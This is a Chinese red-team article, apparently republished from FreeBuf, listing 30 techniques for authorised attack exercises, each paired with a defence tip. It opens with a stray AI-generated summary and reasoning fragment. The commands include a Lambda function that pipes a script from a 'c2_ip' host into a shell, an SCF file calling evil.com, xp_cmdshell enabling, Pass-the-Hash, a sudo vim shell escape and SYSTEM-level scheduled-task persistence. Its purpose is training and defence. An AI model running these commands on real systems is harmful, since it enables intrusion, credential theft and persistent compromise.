实战攻防演练期间,你必备的30条红队打点思路!
好,我需要帮用户总结这篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我快速浏览文章,发现它主要讲红队在攻防演练中的打点思路,包括信息收集、漏洞利用、权限提升等30条实战经验。文章还提到了一些工具和防御措施,最后强调了三条行动铁律。 接下来,我需要将这些关键点浓缩到100字左右。要确保涵盖主要阶段:信息收集、边界突破、权限提升和横向移动。同时提到工具和防御,并简要说明红队的价值。 可能会这样组织:红队在演练中通过信息收集、漏洞利用等30条实战思路建立攻击据点,涉及工具和防御措施,并强调三条行动铁律。 检查字数是否符合要求,调整用词使其更简洁。最终确保内容准确且精炼。 </think> 文章总结了红队在攻防演练中建立攻击据点的30条实战思路,涵盖信息收集、漏洞利用、权限提升及横向移动等关键环节,并提供了工具、案例和防御建议。 2026-3-6 02:0:49 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

在攻防演练中,红队的首要任务是快速建立有效攻击据点。本文基于项目经验,提炼出30条经过实战验证的打点思路,覆盖信息收集、漏洞利用、权限提升等关键环节,供参考。

一、信息收集阶段

1. 企业数字资产测绘

  • 手法
    通过企查查获取子公司列表 → 使用Amass进行关联域名发现 → Subfinder爆破三级域名``` subfinder -d example.com -o subdomains.txt

  * • **案例** :某电商企业通过子公司域名发现未下线的测试环境(test.retail.example.com)
  * • **防御** :建立自动化资产盘点系统,每周扫描暴露面

#### 2. **GitHub敏感信息狩猎**
  * • **实战技巧** :```
# 使用GitHub API搜索API密钥  
requests.get("https://api.github.com/search/code?q=org:Company+filename:.env+password")
  • 关键发现 :某金融机构泄露阿里云AK/SK导致OSS桶被拖取
  • 防护 :部署GitGuardian等自动扫描工具

3. 历史漏洞关联利用

  • 操作路径
    CNVD → ExploitDB → 目标企业名称
  • 典型漏洞 :Struts2 S2-045(CVE-2017-5638)在老旧系统未修复
  • 加固 :建立CVE漏洞生命周期管理机制

4. 证书透明度日志监控

  • 工具 :CertSpotter实时监控新签发的域名证书
  • 战果 :通过新证书发现未备案的vpn.newoffice.example.com
  • 防御 :订阅CT日志告警

5. 员工信息画像构建

  • 方法
    社交媒体员工职位分析 + 脉脉部门架构 → 生成社工字典
  • 字典样例
    {部门缩写}{姓名首字母}{入职年份}@example.com
  • 防护 :员工安全意识培训+登录异常检测

二、边界突破技巧

6. 失效资产再利用

  • 场景
    接管废弃子域名(如停用的xx.example.com)```

dig CNAME old-app.example.com


  * • **案例** :某物流公司停用系统未删除云解析记录
  * • **防御** :资产下线自动化清理流程

#### 7. **OAuth令牌劫持**
  * • **漏洞利用** :  
截获未校验`state`参数的OAuth回调请求
  * • **工具** :修改Burp OAuth插件实现自动化
  * • **防护** :强制PKCE校验+state参数绑定会话

#### 8. **API未授权访问**
  * • **高频漏洞点** :```
GET /api/v1/users?page=1&size=100  # 用户信息泄露  
POST /actuator/refresh             # Spring Boot配置重载
  • 防御 :网关层强制身份认证

9. 云存储桶接管

  • 攻击路径
      1. 扫描s3.{region}.amazonaws.com
      1. 尝试aws s3 ls s3://bucket-name --no-sign-request
  • 战果 :某视频平台配置桶可匿名写导致首页篡改
  • 加固 :开启存储桶策略校验

10. 邮件服务器渗透

  • 手法 :``` nmap -p25,465,587 --script smtp-open-relay target.com

  * • **利用** :通过开放转发发送钓鱼邮件
  * • **防护** :禁用SMTP匿名中继

#### 11. **VPN漏洞链利用**
  * • **经典组合拳** :  
CVE-2019-11510(Pulse VPN)→ 读取/etc/passwd → 密码破解
  * • **防御** :VPN设备纳入高危漏洞快速响应机制

#### 12. **WAF绕过实战**
  * • **SQL注入绕过** :```
/*!50000SELECT*/1,2,3FROM users  # MySQL内联注释
  • 工具 :sqlmap tamper脚本定制
  • 防护 :WAF规则深度调优(非默认规则)

13. 0day武器化投放

  • 操作守则
    • • 仅用于授权目标
    • • 优先选择无文件攻击方式
    • • 使用Cobalt Strike内存加载
  • 防护 :EDR+流量沙箱联动分析

三、权限提升路径

14. Windows本地提权

  • 漏洞利用链 :``` 服务账户SeImpersonatePrivilegePrintSpoofer.exeSYSTEM权限

  * • **工具** :SweetPotato提权套件
  * • **防御** :禁用非必要服务权限

#### 15. **Linux sudo滥用**
  * • **检测命令** :```
sudo -l | grep -E 'nmap|vim|find|python'
  • 经典利用 :``` sudo vim -c ':!/bin/bash'# 通过vim提权

  * • **加固** :最小化sudo权限

#### 16. **Kerberos委派攻击**
  * • **攻击流程** :
    1. 1. 使用BloodHound识别约束委派
    2. 2. 通过s4u2self获取目标服务票据
  * • **工具** :Rubeus自动化利用
  * • **防护** :禁用非必要委派

#### 17. **云角色权限提升**
  * • **AWS场景** :```
{  
"Effect":"Allow",  
"Action":"iam:PassRole",  
"Resource":"*"// 高风险配置  
}
  • 利用 :通过PassRole获得管理员权限
  • 防御 :遵循最小权限原则

18. 数据库提权

  • MSSQL利用 :``` EXEC sp_configure 'show advanced options',1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell',1;
    RECONFIGURE;
    EXEC xp_cmdshell 'whoami';

  * • **防护** :删除危险存储过程

#### 19. **计划任务劫持**
  * • **Windows检测** :```
Get-ScheduledTask | Where State -eq"Ready"
  • 利用 :替换任务执行的脚本文件
  • 防御 :计划任务文件ACL控制

20. DLL劫持路径

  • 工具 :Process Monitor监控加载行为
  • 防护 :启用DLL签名验证

四、横向移动策略(6种隐蔽通道)

21. NTLM中继攻击

  • 配置要点 :``` [Responder]
    SMB = Off# 禁用自身SMB服务
    HTTP = Off

  * • **工具链** :Responder + ntlmrelayx.py
  * • **防御** :启用SMB签名

#### 22. **Pass-the-Hash实战**
  * • **命令** :```
crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH>
  • 防护 :限制本地管理员权限

23. 金票据生成

  • 条件
    • • krbtgt的NTLM Hash
    • • 域名SID
  • 工具 :mimikatz kerberos::golden
  • 防御 :定期重置krbtgt密码

24. WMI无文件渗透

  • 远程执行 :``` Invoke-WmiMethod-ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList"calc.exe"

  * • **检测** :Sysmon事件ID 19监控

#### 25. **SCF文件劫持**
  * • **武器化文件** :```
[Shell]  
Command=2  
IconFile=\\evil.com\share\pentestlab.ico
  • 防护 :禁用WebClient服务

26. 打印机漏洞利用

  • 漏洞 :CVE-2021-1675(PrintNightmare)
  • 检测命令 :``` rpcdump.py | grep MS-RPRN

  * • **加固** :禁用Point and Print

### 五、权限维持技巧

#### 27. **隐藏计划任务**
  * • **创建命令** :```
schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM /f
  • 检测 :Autoruns分析隐藏任务

28. 影子账户克隆

  • 步骤
      1. 激活Administrator账户
      1. 修改注册表F值克隆账户
  • 工具 :mimikatz ts::sessions
  • 防御 :监控SAM数据库变更

29. Office加载项后门

  • 部署路径
    %AppData%\Microsoft\Word\STARTUP\
  • 检测 :启用宏执行日志审计

30. 云函数持久化

  • AWS Lambda示例 :``` defhandler(event, context):
        os.system("curl http://c2_ip/install.sh | sh")

  * • **防护** :函数代码完整性检查

### 红队行动备忘录

**三条铁律** :
  1. 1. 所有操作必须获得书面授权
  2. 2. 数据渗出需进行匿名化处理
  3. 3. 清理所有攻击痕迹(包括内存驻留)

**典型失败案例** :  
某红队因未清除Mimikatz内存dump被蓝队溯源,导致攻击路径完全暴露

攻防本质是成本对抗,红队的价值在于帮助企业以最小代价发现致命弱点。演练结束才是真正安全建设的开始。

文章来源: https://www.freebuf.com/articles/472664.html
如有侵权请联系:admin#unsafe.sh